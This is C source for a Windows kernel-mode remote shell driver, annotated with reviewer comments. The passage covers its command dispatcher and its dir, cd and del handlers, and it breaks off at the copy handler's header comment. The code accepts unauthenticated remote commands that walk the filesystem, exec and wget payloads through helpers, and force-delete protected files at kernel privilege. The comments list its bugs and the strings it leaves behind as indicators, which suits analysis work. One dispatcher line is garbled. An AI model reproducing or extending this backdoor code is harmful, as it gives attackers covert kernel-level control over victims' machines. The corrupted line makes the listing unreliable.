

/// 
//	uty@uaty 
/// 
#include  
#include "structs.h" 
#include "commAnd.h" 
#include "utils.h" 
 
 
NTSTATUS 
uSend( 
	  PTCPS_Connection		pConnection, 
	  char					*pSendBuffer, 
	  ULONG					ulSendBufferSize 
	  ); 
/* 
typedef struct FILE_BASIC_INFORMATION { 
  LARGE_INTEGER  CreationTime; 
  LARGE_INTEGER  LastAccessTime; 
  LARGE_INTEGER  LastWriteTime; 
  LARGE_INTEGER  ChangeTime; 
  ULONG  FileAttributes; 
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; 
 
typedef struct _FILE_DISPOSITION_INFORMATION { 
  BOOLEAN  DeleteFile; 
} FILE_DISPOSITION_INFORMATION; 
*/ 
 
#define		SENDBUFLENGTH		1024 
#define		MAXPATHLENGTH_W		511*2 
#define		MAXPATHLENGTH_A		511 
#define		MAXARGLENGTH_W		255*2 
#define		MAXARGLENGTH_A		255 
 
NTSYSAPI 
NTSTATUS 
NTAPI 
ZwQueryDirectoryFile( 
	IN HANDLE FileHandle, 
	IN HANDLE Event OPTIONAL, 
	IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 
	IN PVOID ApcContext OPTIONAL, 
	OUT PIO_STATUS_BLOCK IoStatusBlock, 
	OUT PVOID FileInformation, 
	IN ULONG FileInformationLength, 
	IN FILE_INFORMATION_CLASS FileInformationClass, 
	IN BOOLEAN ReturnSingleEntry, 
	IN PUNICODE_STRING FileName OPTIONAL, 
	IN BOOLEAN RestartScan 
	); 
 
NTSYSAPI 
NTSTATUS 
NTAPI 
ZwDeleteFile( 
	IN POBJECT_ATTRIBUTES ObjectAttributes 
	); 
 
NTSYSAPI 
NTSTATUS 
NTAPI 
ZwSetInformationFile( 
    IN HANDLE  FileHandle, 
    OUT PIO_STATUS_BLOCK  IoStatusBlock, 
    IN PVOID  FileInformation, 
    IN ULONG  Length, 
    IN FILE_INFORMATION_CLASS  FileInformationClass 
    ); 
 
NTSYSAPI 
NTSTATUS 
NTAPI 
ZwWriteFile( 
	IN HANDLE  FileHandle, 
	IN HANDLE  Event  OPTIONAL, 
	IN PIO_APC_ROUTINE  ApcRoutine  OPTIONAL, 
	IN PVOID  ApcContext  OPTIONAL, 
	OUT PIO_STATUS_BLOCK  IoStatusBlock, 
	IN PVOID  Buffer, 
	IN ULONG  Length, 
	IN PLARGE_INTEGER  ByteOffset  OPTIONAL, 
	IN PULONG  Key  OPTIONAL 
	); 
 
NTSYSAPI 
NTSTATUS 
NTAPI  
ZwReadFile( 
	IN HANDLE  FileHandle, 
	IN HANDLE  Event  OPTIONAL, 
	IN PIO_APC_ROUTINE  ApcRoutine  OPTIONAL, 
	IN PVOID  ApcContext  OPTIONAL, 
	OUT PIO_STATUS_BLOCK  IoStatusBlock, 
	OUT PVOID  Buffer, 
	IN ULONG  Length, 
	IN PLARGE_INTEGER  ByteOffset  OPTIONAL, 
	IN PULONG  Key  OPTIONAL 
	); 
 
BOOLEAN 
KWget( 
	PCHAR	szURL, 
	PCHAR	szFileNAme 
	); 
 
BOOLEAN 
KExec( 
	PCHAR	CmdLine 
	); 
//-------------------------------------------------------------------- 
 
//ReferenceCommAnd does not free the memory occupied by pRecvList; the caller owns it.
/*
 * ReferenceCommAnd - dispatch one line received on the backdoor's TCP
 * connection to the matching CommAnd_* handler.
 *
 * Reviewer note on context: this is the command loop of a kernel-mode
 * remote shell.  Nothing in this file authenticates or authorizes the peer;
 * whatever the remote side sends is acted on with kernel privileges
 * (dir/cd/del/copy on any path the kernel can open, exec/wget through
 * KExec/KWget, which are defined elsewhere).  The fixed response strings
 * ("unreferenced commAnd :>", "hAy! file nAme is too long,...") and the
 * DbgPrint of every received command line are usable as network and
 * debugger-output indicators.
 *
 * pRecvList->dAtA is the raw, NUL-terminated command line.  pRecvList and
 * its buffer belong to the caller and are not freed here.
 * Always returns STATUS_SUCCESS; per-command failures are reported to the
 * peer with uSend instead of through the return value.
 *
 * Known defects, left as-is in this review:
 *  - ExAllocatePool results are never checked; a NULL return is dereferenced.
 *  - dAtA[strlen(dAtA)-1] = '\0' writes one byte BEFORE the buffer when the
 *    line is empty (strlen == 0, index wraps).
 *  - The "dir" length check compares a character count with MAXPATHLENGTH_W,
 *    which is a byte size (the other handlers multiply by 2 first), so it
 *    permits roughly twice what the buffer holds.
 *  - The page this listing was taken from is corrupted between the Argv
 *    debug loop and the first command branch (marked below); that span is
 *    reproduced verbatim and cannot be reviewed.
 */
NTSTATUS 
ReferenceCommAnd(PRECVLIST	pRecvList) 
{ 
	/* help text sent back for the (missing, see corruption note) help branch */
	CHAR* usAge =	"It think the most vAlueAble commAnds Are:\n" 
					" dir	\n" 
					" cd	\n" 
					" exec	\n" 
					" wget	\n" 
					" copy	\n" 
					" del	\n" 
					" pwd	\n" 
					" chAngedriver	\n" 
					"		\n"; 
	ULONG	Argc; 
	CHAR*	Argv[9];	// at most 9 arguments are parsed (GetArg is passed 9 as the cap) 
	WCHAR	*tempforpAth;	// "\??\" + the connection's current directory (m_PAth) 
	CHAR	*AnsiTemp;	// ANSI conversion of m_PAth for the "pwd" reply 
	ULONG	i; 
 
	// NOTE(review): neither allocation is NULL-checked before use below. 
	tempforpAth		= ExAllocatePool(PagedPool,MAXPATHLENGTH_W); 
	AnsiTemp		= ExAllocatePool(PagedPool,SENDBUFLENGTH); 
 
	// sizeof(L"\\??\\") copies the terminating NUL as well (10 bytes). 
	RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\")); 
	// Every remote command line is echoed to the kernel debugger output. 
	DbgPrint("commAndline: %s\n",pRecvList->dAtA);//debug 
	// Strip the trailing '\n'.  BUG: on an empty line strlen()==0 and the 
	// index wraps to (size_t)-1, writing outside the buffer. 
	pRecvList->dAtA[strlen(pRecvList->dAtA)-1] = '\0'; 
 
	// GetArg (utils.h, not visible here) splits dAtA into Argc/Argv in place; 
	// presumably Argv entries point into dAtA -- confirm in utils.c. 
	GetArg(pRecvList->dAtA,&Argc,Argv,9); 
	DbgPrint("Argc: %d\n",Argc);//debug 
 
	// NOTE(review): the following line is corrupted in the source listing; the 
	// original text from the Argv debug loop up to the first command branch 
	// (which sends usAge) is lost.  Reproduced verbatim. 
	for(i = 0;ipConnection, 
			usAge, 
			strlen(usAge) 
			); 
	} 
	else if(0 == _stricmp(Argv[0],"dir")){ 
		// Build "\??\<m_PAth>" for the listing.  BUG: wcslen() returns 
		// characters but MAXPATHLENGTH_W is in bytes; compare (len)*2 as the 
		// other handlers do. 
		if(wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth) < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth,pRecvList->pConnection->m_PAth);// \??\m_PAth 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_ReferenceCommAnd; 
		} 
		CommAnd_Dir(pRecvList,tempforpAth); 
	} 
	else if(0 == _stricmp(Argv[0],"cd")){ 
		CommAnd_Cd(pRecvList,Argc,Argv);		 
	} 
	else if(0 == _stricmp(Argv[0],"exec")){ 
		CommAnd_Exec(pRecvList,Argc,Argv); 
	} 
	else if(0 == _stricmp(Argv[0],"wget")){ 
		CommAnd_Wget(pRecvList,Argc,Argv); 
	} 
	else if(0 == _stricmp(Argv[0],"copy")){ 
		CommAnd_Copy(pRecvList,Argc,Argv); 
	} 
	else if(0 == _stricmp(Argv[0],"del")){ 
		CommAnd_Del(pRecvList,Argc,Argv); 
	} 
	else if(0 == _stricmp(Argv[0],"pwd")){ 
		// Reply with the current directory.  Relies on m_PAth being short 
		// enough that its ANSI form plus "\n" fits SENDBUFLENGTH (1024); the 
		// original comment claims m_PAth is bounded at 512 -- its real size is 
		// in structs.h, not visible here. 
		wtoA((WCHAR*)pRecvList->pConnection->m_PAth,(CHAR*)AnsiTemp); 
		strcat(AnsiTemp,"\n");	// terminate the line so the client prompt does not stick to it 
		uSend( 
			pRecvList->pConnection, 
			AnsiTemp, 
			strlen(AnsiTemp) 
			); 
	} 
	else if(0 == _stricmp(Argv[0],"chAngeDriver")){ 
		CommAnd_ChAngeDriver(pRecvList,Argc,Argv); 
	} 
	else if(0 == strcmp(Argv[0],"")){	// bare Enter: the '\n' was already stripped above 
		//do nothing 
	} 
	else{ 
		uSend( 
			pRecvList->pConnection, 
			"unreferenced commAnd :>\n", 
			strlen("unreferenced commAnd :>\n") 
			); 
	} 
 
end_ReferenceCommAnd: 
 
	ExFreePool(tempforpAth); 
	ExFreePool(AnsiTemp); 
 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Dir - list the directory at pAth (an NT path such as
 * "\??\C:\dir\") and send one entry name per line to the peer.
 * Directory entries get "\t\t" appended before the newline.
 *
 * pAth      : NUL-terminated wide NT path, built by the caller.
 * Returns STATUS_SUCCESS unconditionally; errors go to the peer via uSend.
 *
 * Known defects, left as-is in this review:
 *  - ZwOpenFile failure is only reported when the return is STATUS_PENDING;
 *    any other failure (e.g. name not found) falls straight into the query
 *    loop with hFileHAndle uninitialized.  Even the STATUS_PENDING branch
 *    does not bail out.
 *  - The loop tests IoStAtusBlock.Status rather than the return value, so
 *    the normal end of enumeration (presumably mirrored into the status
 *    block as STATUS_NO_MORE_FILES -- confirm) exits through the
 *    "bAd directory" branch, which skips ZwClose: the directory handle leaks
 *    on every listing, and the while(...) condition at the bottom is dead.
 *  - The first entry of each buffer is emitted, then the inner do/while runs
 *    its body once before checking NextEntryOffset; when the buffer holds a
 *    single entry (offset 0) that entry is sent twice.
 *  - FileNameLength is in bytes; a copy of exactly TEMPBUFFERLENGTHBYTES
 *    leaves temp without a terminator, and the "\t\t" length check compares
 *    characters against a byte limit.  The inner loop has no check at all.
 *  - ExAllocatePool results are not NULL-checked.
 */
NTSTATUS	CommAnd_Dir(PRECVLIST	pRecvList,WCHAR* pAth) 
{ 
	HANDLE							hFileHAndle; 
	OBJECT_ATTRIBUTES				oA; 
	IO_STATUS_BLOCK					IoStAtusBlock;  
#define		INFORBUFFERLENGTH	1024 
	CHAR							*InforBuffer;	// raw FILE_DIRECTORY_INFORMATION chain 
#define		TEMPBUFFERLENGTHBYTES	1020 //4 bytes for '\n' 
	WCHAR							*temp;		// one entry name, wide 
	PFILE_DIRECTORY_INFORMATION		pInfor; 
	UNICODE_STRING					nAme; 
	NTSTATUS						dwStAtus; 
	CHAR							*SendBuffer;	// ANSI line sent to the peer 
 
	// NOTE(review): none of these allocations is NULL-checked. 
	SendBuffer		= ExAllocatePool(PagedPool,SENDBUFLENGTH); 
	InforBuffer		= ExAllocatePool(PagedPool,INFORBUFFERLENGTH); 
	temp			= ExAllocatePool(PagedPool,TEMPBUFFERLENGTHBYTES); 
 
	RtlInitUnicodeString(&nAme,pAth); 
	InitializeObjectAttributes( 
		&oA, 
		&nAme, 
		OBJ_CASE_INSENSITIVE, 
		NULL, 
		NULL 
		); 
 
	dwStAtus = ZwOpenFile( 
					&hFileHAndle, 
					GENERIC_READ, 
					&oA, 
					&IoStAtusBlock, 
					FILE_SHARE_READ, 
					FILE_DIRECTORY_FILE 
					); 
	DbgPrint("dwStAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",dwStAtus,IoStAtusBlock.Status); 
	// BUG: only STATUS_PENDING is treated as an error, and even then execution 
	// continues into the query loop with an unopened handle.  Any other 
	// failure status is silently ignored.  (Original note: "needs improvement") 
	if(dwStAtus == STATUS_PENDING && IoStAtusBlock.Status != STATUS_SUCCESS){ 
		uSend( 
			pRecvList->pConnection, 
			"error\n", 
			strlen("error\n") 
			); 
	} 
 
	do{ 
		RtlZeroMemory(InforBuffer,INFORBUFFERLENGTH); 
		// ReturnSingleEntry == FALSE: the buffer may hold several entries 
		// chained by NextEntryOffset. 
		dwStAtus = ZwQueryDirectoryFile(	 
			hFileHAndle, 
			NULL, 
			NULL, 
			NULL, 
			&IoStAtusBlock, 
			InforBuffer, 
			INFORBUFFERLENGTH, 
			FileDirectoryInformation, 
			FALSE, 
			NULL, 
			FALSE 
			); 
		// BUG (author also marked this): checks the status block instead of 
		// dwStAtus.  End of enumeration therefore exits here, sending 
		// "bAd directory" and skipping ZwClose below (handle leak). 
		if (IoStAtusBlock.Status != STATUS_SUCCESS){ 
			uSend( 
				pRecvList->pConnection, 
				"bAd directory\n", 
				strlen("bAd directory\n") 
				); 
			goto end_CommAnd_Dir; 
		} 
 
		pInfor = (PFILE_DIRECTORY_INFORMATION)InforBuffer; 
 
		// First entry of the buffer.  FileNameLength is a byte count; a copy 
		// of the full TEMPBUFFERLENGTHBYTES leaves no room for a terminator. 
		RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES); 
		RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES); 
		if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){ 
			// Mark directories with a trailing "\t\t".  The bound compares a 
			// character count against MAXPATHLENGTH_W (bytes) and against the 
			// wrong buffer (temp is TEMPBUFFERLENGTHBYTES, not MAXPATHLENGTH_W). 
			if(wcslen(temp) + wcslen(L"\t\t") < MAXPATHLENGTH_W){ 
				wcscat(temp,L"\t\t"); 
			}else{ 
				uSend( 
					pRecvList->pConnection, 
					"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
					strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
					); 
				goto end_CommAnd_Dir; 
			} 
		}else{ 
			//do nothing 
		} 
		RtlZeroMemory(SendBuffer,SENDBUFLENGTH); 
		wtoA(temp,SendBuffer); 
		strcat(SendBuffer,"\n"); 
		uSend( 
			pRecvList->pConnection, 
			SendBuffer, 
			strlen(SendBuffer) 
			); 
		// (original note: SendBuffer must not be cleared here) 
		// Remaining entries.  BUG: do/while advances by NextEntryOffset before 
		// testing it, so a buffer with a single entry (offset 0) re-sends the 
		// entry just emitted above. 
		do{ 
			pInfor = (PFILE_DIRECTORY_INFORMATION)((PCHAR)pInfor + pInfor->NextEntryOffset); 
			RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES); 
			RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES); 
			if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){ 
				// No length check here, unlike the first-entry path above. 
				wcscat(temp,L"\t\t"); 
			}else{ 
				//do nothing 
			} 
			RtlZeroMemory(SendBuffer,SENDBUFLENGTH); 
			// temp is at most 510 WCHARs, so its ANSI form fits SENDBUFLENGTH. 
			wtoA(temp,SendBuffer); 
			strcat(SendBuffer,"\n"); 
			uSend( 
				pRecvList->pConnection, 
				SendBuffer, 
				strlen(SendBuffer) 
				); 
			// (original note: SendBuffer must not be cleared here) 
		}while(pInfor->NextEntryOffset != 0); 
	}while(IoStAtusBlock.Status != STATUS_NO_MORE_FILES);	// effectively unreachable, see above 
 
	ZwClose(hFileHAndle);	// only reached if the loop exits normally, which it does not 
 
end_CommAnd_Dir: 
	ExFreePool(SendBuffer); 
	ExFreePool(InforBuffer); 
	ExFreePool(temp); 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Cd - change the connection's current directory (m_PAth).
 *
 * Argv[1] is one of:
 *   ".."  - strip path components (see defect below),
 *   "\"   - reset to the drive root by truncating m_PAth after 3 characters,
 *   name  - a path appended to m_PAth, accepted only if
 *           "\??\<m_PAth><name>" can be opened as a directory.
 * Accepting any openable directory means there is no confinement; the
 * peer may walk the whole filesystem the kernel can reach.
 * Returns STATUS_SUCCESS unconditionally; errors go to the peer via uSend.
 *
 * Known defects, left as-is in this review:
 *  - The ".." branch returns without freeing tempforpAth/tempforArg (pool
 *    leak).  Its loop also truncates at EVERY backslash it meets while
 *    scanning downward, so "cd .." always lands on the drive root rather
 *    than one level up.
 *  - The "\" branch assumes m_PAth starts with "X:\" (3 characters).
 *  - ZwClose is called even when ZwOpenFile failed (hFileHAndle is then
 *    uninitialized), and is skipped by the goto in the too-long branch
 *    after a successful open (handle leak).
 *  - ExAllocatePool results are not NULL-checked.
 *  - No normalization of "..", so a name argument can still escape upward.
 */
NTSTATUS CommAnd_Cd(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	HANDLE					hFileHAndle; 
	OBJECT_ATTRIBUTES		oA; 
	UNICODE_STRING			nAme; 
	NTSTATUS				dwStAtus; 
	IO_STATUS_BLOCK			IoStAtusBlock; 
 
	WCHAR	*tempforpAth;	// "\??\" + m_PAth + Argv[1], wide 
	WCHAR	*tempforArg;	// Argv[1] converted to WCHAR 
	ULONG	i; 
 
	// NOTE(review): neither allocation is NULL-checked. 
	tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W); 
	tempforArg	= ExAllocatePool(PagedPool,MAXARGLENGTH_W); 
 
	if(Argc < 2){ 
		// "cd" with no argument: nothing to do. 
		goto end_CommAnd_Cd; 
	} 
	if(Argc > 2){ 
		uSend( 
			pRecvList->pConnection, 
			"too mAny Arguments\n", 
			strlen("too mAny Arguments\n") 
			); 
		goto end_CommAnd_Cd; 
	} 
	if(0 == strcmp(Argv[1],"..")){ //cd .. 
		// BUG: scanning from the end, every '\\' met truncates the string, so 
		// the path collapses to "X:\" instead of dropping one component. 
		for (i = wcslen(pRecvList->pConnection->m_PAth);i > 0;i--){ 
			if(pRecvList->pConnection->m_PAth[i] == L'\\'){ 
				pRecvList->pConnection->m_PAth[i] = L'\0'; 
				if(wcslen(pRecvList->pConnection->m_PAth) == 2){	// "X:" -> restore the root backslash 
					wcscat(pRecvList->pConnection->m_PAth,L"\\"); 
				} 
			} 
		} 
		// BUG: returns without reaching end_CommAnd_Cd -- both pool buffers leak. 
		return STATUS_SUCCESS; 
	} 
	if(0 == strcmp(Argv[1],"\\")){ //cd \  
		// Assumes m_PAth begins with "X:\". 
		pRecvList->pConnection->m_PAth[3] = L'\0'; 
		goto end_CommAnd_Cd; 
	} 
 
	RtlZeroMemory(tempforArg,MAXARGLENGTH_W); 
	if(strlen(Argv[1]) < MAXARGLENGTH_A){ 
		Atow(Argv[1],tempforArg); 
	}else{ 
		uSend( 
			pRecvList->pConnection, 
			"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
			strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
			); 
		goto end_CommAnd_Cd; 
	} 
	// Equivalent of sprintf(tempforpAth, L"\\??\\%S%S", m_PAth, tempforArg), 
	// built by hand with byte-based (len*2) bounds checks. 
	RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W); 
	RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));	// sizeof, not wcslen: copies the NUL too 
	if ((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W ){ 
		wcscat(tempforpAth,pRecvList->pConnection->m_PAth); 
	}else{ 
		uSend( 
			pRecvList->pConnection, 
			"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
			strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
			); 
		goto end_CommAnd_Cd; 
	} 
	// No separator is inserted here: m_PAth is expected to already end in "\". 
	if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){ 
		wcscat(tempforpAth,tempforArg); 
	}else{ 
		uSend( 
			pRecvList->pConnection, 
			"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
			strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
			); 
		goto end_CommAnd_Cd; 
	} 
	DbgPrint("cd PAth: %S\n",tempforpAth);//debug 
 
 
	RtlInitUnicodeString(&nAme,tempforpAth); 
	InitializeObjectAttributes( 
		&oA, 
		&nAme, 
		OBJ_CASE_INSENSITIVE, 
		NULL, 
		NULL 
		); 
	// The directory is "validated" simply by opening it. 
	dwStAtus = ZwOpenFile( 
					&hFileHAndle, 
					GENERIC_READ, 
					&oA, 
					&IoStAtusBlock, 
					FILE_SHARE_READ, 
					FILE_DIRECTORY_FILE 
					); 
 
	DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug 
	DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
 
	// The second clause is redundant (already covered by != STATUS_SUCCESS). 
	if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){ 
		uSend( 
			pRecvList->pConnection, 
			"direcotry does not exists\n", 
			strlen("direcotry does not exists\n") 
			); 
	}else{ 
		// Commit: m_PAth += tempforArg + "\".  +2 covers the "\" and the NUL. 
		if((wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg) + 2 )*2 < MAXPATHLENGTH_W){ 
			wcscat(pRecvList->pConnection->m_PAth,tempforArg); 
			wcscat(pRecvList->pConnection->m_PAth,L"\\"); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Cd;	// BUG: skips ZwClose, leaking the open handle 
		} 
	} 
	// BUG: also executed on the failure path above, where hFileHAndle was never set. 
	ZwClose(hFileHAndle); 
 
end_CommAnd_Cd: 
	ExFreePool(tempforpAth); 
	ExFreePool(tempforArg); 
 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Del - delete every file named in Argv[1..Argc-1], each resolved
 * relative to the connection's current directory as "\??\<m_PAth><arg>".
 *
 * Deletion is done by opening the file with DELETE access, first resetting
 * its attributes to FILE_ATTRIBUTE_NORMAL (which clears read-only, hidden
 * and system), then setting FileDispositionInformation.DeleteFile = TRUE
 * and closing the handle.  In other words this is a forced delete of
 * protected files, at kernel privilege, driven by the remote peer.
 * Returns STATUS_SUCCESS unconditionally.
 *
 * Known defects, left as-is in this review:
 *  - The results of both ZwSetInformationFile calls are only DbgPrint'ed;
 *    the peer is told nothing if the delete is refused, so failures are
 *    silent.
 *  - ExAllocatePool results are not NULL-checked.
 *  - The "do not exists" message is sent for any open failure, including
 *    access denied and sharing violations.
 */
NTSTATUS CommAnd_Del(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	HANDLE					hFileHAndle; 
	OBJECT_ATTRIBUTES		oA; 
	UNICODE_STRING			nAme; 
	IO_STATUS_BLOCK			IoStAtusBlock; 
	NTSTATUS				dwStAtus; 
 
	WCHAR	*tempforpAth;	// "\??\" + m_PAth + Argv[i], wide 
	WCHAR	*tempforArg;	// Argv[i] converted to WCHAR 
	ULONG	i; 
 
	// All-zero: timestamps of 0 are, as far as I recall, treated as "leave 
	// unchanged" by FileBasicInformation -- confirm against the DDK docs. 
	FILE_BASIC_INFORMATION				fileBAsicInfor= {0}; 
	FILE_DISPOSITION_INFORMATION		fileDispositionInfor; 
 
	// NOTE(review): neither allocation is NULL-checked. 
	tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W); 
	tempforArg	= ExAllocatePool(PagedPool,MAXARGLENGTH_W); 
 
	// With Argc < 2 the loop body never runs and nothing is reported. 
	for(i = 1;i < Argc;i++){ 
		RtlZeroMemory(tempforArg,MAXARGLENGTH_W); 
		// Bound the argument before converting it. 
		if (strlen(Argv[i]) < MAXARGLENGTH_A){ 
			Atow(Argv[i],tempforArg); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Del; 
		} 
		RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W); 
		RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\")); 
		// Byte-based bound (len*2) on the prefix + current directory. 
		if((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth,pRecvList->pConnection->m_PAth); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Del; 
		} 
		// Unlike CommAnd_Copy there is no absolute-path branch here: the 
		// argument is always appended to m_PAth. 
		if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth,tempforArg); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Del; 
		} 
		DbgPrint("del file: %S\n",tempforpAth);//debug 
		RtlInitUnicodeString(&nAme,tempforpAth); 
		InitializeObjectAttributes( 
			&oA, 
			&nAme, 
			OBJ_CASE_INSENSITIVE, 
			NULL, 
			NULL 
			); 
		 
		// DELETE access is needed for the disposition set below; 
		// FILE_WRITE_ATTRIBUTES for the attribute reset. 
		dwStAtus = ZwOpenFile( 
						&hFileHAndle, 
						GENERIC_READ|FILE_WRITE_ATTRIBUTES|DELETE,//|GENERIC_WRITE|DELETE, 
						&oA, 
						&IoStAtusBlock, 
						FILE_SHARE_READ|FILE_SHARE_WRITE, 
						FILE_NON_DIRECTORY_FILE 
						); 
		DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug 
		DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
		// Second clause is redundant; every non-success status ends up here. 
		if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){ 
			uSend( 
				pRecvList->pConnection, 
				Argv[i], 
				strlen(Argv[i]) 
				); 
			uSend( 
				pRecvList->pConnection, 
				" do not exists\n", 
				strlen(" do not exists\n") 
				); 
			continue; 
		} 
		// Strip read-only / hidden / system by replacing the attributes 
		// outright with NORMAL, so the disposition set below is not refused. 
		fileBAsicInfor.FileAttributes = FILE_ATTRIBUTE_NORMAL; 
		dwStAtus = ZwSetInformationFile( 
						hFileHAndle, 
						&IoStAtusBlock, 
						&fileBAsicInfor, 
						sizeof(FILE_BASIC_INFORMATION), 
						FileBasicInformation 
						); 
		DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug   (result not acted on) 
		DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
 
		// Mark for deletion on close. 
		fileDispositionInfor.DeleteFile = TRUE; 
		dwStAtus = ZwSetInformationFile( 
						hFileHAndle, 
						&IoStAtusBlock, 
						&fileDispositionInfor, 
						sizeof(FILE_DISPOSITION_INFORMATION), 
						FileDispositionInformation 
						); 
		DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug   (result not acted on) 
		DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
		// The open succeeded, so the handle is non-NULL here; the test is moot. 
		if(hFileHAndle){ 
			ZwClose(hFileHAndle);	// the delete takes effect on this close 
		} 
		/* 
		Earlier variant using ZwDeleteFile, kept by the author for reference: 
		dwStAtus = ZwDeleteFile( 
			&oA 
			); 
		DbgPrint("dwStAtus: 0x%x\n",dwStAtus); 
		if(dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){ 
			uSend( 
				pRecvList->pConnection, 
				Argv[i], 
				strlen(Argv[i]) 
				); 
			uSend( 
				pRecvList->pConnection, 
				" do not exists\n", 
				strlen(" do not exists\n") 
				); 
			continue; 
		} 
		else if(dwStAtus == STATUS_ACCESS_DENIED){ 
			uSend( 
				pRecvList->pConnection, 
				Argv[i], 
				strlen(Argv[i]) 
				); 
			uSend( 
				pRecvList->pConnection, 
				" : ACCESS DENIED\n", 
				strlen(" : ACCESS DENIED\n") 
				); 
			continue; 
		} 
		else if(dwStAtus == STATUS_SUCCESS){ 
			//do noting; 
			 
			continue; 
		} 
		else if(dwStAtus == STATUS_CANNOT_DELETE){ 
			uSend( 
				pRecvList->pConnection, 
				Argv[i], 
				strlen(Argv[i]) 
				); 
			uSend( 
				pRecvList->pConnection, 
				" : CANNOT DELETE\n", 
				strlen(" : CANNOT DELETE\n") 
				); 
		} 
		else{ 
			uSend( 
				pRecvList->pConnection, 
				"del: error\n", 
				strlen("del: error\n") 
				); 
			continue; 
		} 
		*/ 
	}//for 
 
end_CommAnd_Del: 
	ExFreePool(tempforpAth); 
	ExFreePool(tempforArg); 
 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Copy - copy the file Argv[1] to a new file Argv[2].
 *
 * Each argument is taken as absolute when its second character is ':' and
 * its first is not a space ("c:..."); otherwise it is appended to the
 * connection's current directory.  Both are prefixed with "\??\".
 * The destination is created with FILE_CREATE, so an existing file is not
 * overwritten.  Data is moved in 1024-byte synchronous reads/writes.
 *
 * Returns the last NTSTATUS observed: on the error paths the status of the
 * failing call, and after a completed copy the status of the read that
 * ended the loop (presumably STATUS_END_OF_FILE rather than success --
 * confirm).  ReferenceCommAnd ignores the return value anyway.
 *
 * Known defects, left as-is in this review:
 *  - The Argc checks jump to the cleanup label before dwStAtus is ever
 *    assigned, so those paths return an uninitialized value.
 *  - If ZwCreateFile fails, hFile_source is never closed (handle leak).
 *  - ZwWriteFile's status is ignored; a short or failed write is not
 *    detected, and IoStAtusBlock is shared between the read and the write.
 *  - ExAllocatePool results are not NULL-checked.
 *  - The final "return STATUS_SUCCESS;" is unreachable.
